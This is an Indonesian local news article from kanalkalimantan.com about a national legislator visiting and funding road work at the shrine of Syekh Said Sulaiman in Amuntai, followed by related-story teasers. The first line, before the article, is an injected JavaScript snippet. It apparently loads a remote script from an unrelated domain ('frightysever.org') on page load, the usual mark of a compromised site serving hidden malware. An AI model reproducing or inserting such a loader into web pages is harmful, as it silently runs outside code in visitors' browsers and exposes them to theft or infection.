(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KANALKALIMANTAN.COM, AMUNTAI – Usai meresmikan Laboratorium PCR di RSUD Pambalah Batung Amuntai, anggota DPR RI Bambang Hery Purnama didampingi Bupati Hulu Sungai Utara (HSU) H Abdul Wahid HK juga menyempatkan berziarah ke makam Syekh Said Sulaiman di Desa Murung Karangan Kecamatan Amuntai Utara, Sabtu (26/9/2020) sore.
Bambang yang merupakan anggota DPRD Dapil Kalimantan Selatan ini mengaku terpanggil untuk berziarah sekaligus bersilaturahmi dengan tokoh-tokoh masyarakat.
Selain itu, dalam kunjungannya ini dirinya juga memastikan untuk melihat langsung kondisi pembangunan jalan yang berjarak sekitar 200 meter menuju lokasi makam.
Menurutnya, adanya pembangunan yang baik untuk menuju lokasi makam akan membuat potensi pengembangan objek wisata religi di desa tersebut akan terus meningkat.
“Saya mengharapkan tempat ini menjadi wisata religius, sehingga bisa membuat kesejahteraan masyarakat sekitarnya,” Kata Bambang dalam sambutannya.
Sementara itu, Bupati HSU H Abdul Wahid HK mengaku bersyukur mendapatkan kunjungan anggota DPR RI. Khususnya di kawasan Makam Syekh Said Sulaiman yang dikenal masyarakat HSU sebagai makam keramat salah satu wali “Satu badan dua kubur ” dan juga tokoh penyebar Islam di kawasan HSU ini.
Wahid juga mengucapkan terimakasih kepada Bambang Hery Purnama yang selama ini memberikan donasi pribadi pembangunan kawasan kubah termasuk pembangunan jalan yang sebelumnya hanya dapat diakses dengan mengendarai roda dua namun sekarang sudah dapat dilintasi dengan kendaraan roda empat.
Dirinya juga memastikan bahwa pembangunan kawasan kubah khususnya jalan akan dikerjakan secara bertahap. “Mudah-mudahan apa yang kita harapkan dapat terwujud dan dikabulkan oleh Allah SWT,” imbuhnya.
Seiring dengan itu, Sekdes Murung Karangan, Abdiansyah juga mengaku bersyukur dan berterima kasih atas bantuan yang telah diberikan oleh Bambang Hery Purnama.
Dikatakannya, pembangunan kawasan dan jalan menuju kubah ini telah lama dianggarkan melalui APBdes, namun lantaran adanya wabah covid 19 dan anturan pengalihan dana menjadi BLT Kepada masyarakat, secara otomatis pembangunan kawasan ini menjadi terhenti.
Akan tetapi, Lanjut Abdiansyah dengan adanya donasi dan dukungan pemerintah daerah ia berharap agar pembangunan kawasan objek wisata religi di kubah syekh Said Sulaiman ini dapat terus berjalan,” pungkasnya.(kanalkalimantan.com/dew)
Reporter: Dew
Editor: Cell
KANALKALIMANTAN.COM, BANJARBARU - Rapat Koordinasi (Rakor) Tim Percepatan Penurunan Stunting (TPPS) dilaksanakan oleh Pemerintah Kabupaten… Read More
KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kabupaten Banjar menggelar Gebyar Pemberdayaan Masyarakat Desa, Kamis (12/12/2024) siang di… Read More
KANALKALIMANTAN.COM, MARTAPURA - Dinas Pekerjaan Umum, Penataan Ruang dan Pertanahan (PUPRP) Kabupaten Banjar menggelar pertemuan… Read More
KANALKALIMANTAN.COM, BANJARBARU - Rumah Sakit Daerah (RSD) Idaman Banjarbaru berhasil meraih peringkat satu penghargaan Eco… Read More
KANALKALIMANTAN.COM, PARINGIN - Memastikan pemasangan dan kondisi lampu Penerangan Jalan Umum (PJU) berjalan dengan baik,… Read More
KANALKALIMANTAN.COM, BANJARBARU - Wali Kota dan Wakil Wali Kota Banjarbaru menyatukan suara bersama masyarakat Kota… Read More
This website uses cookies.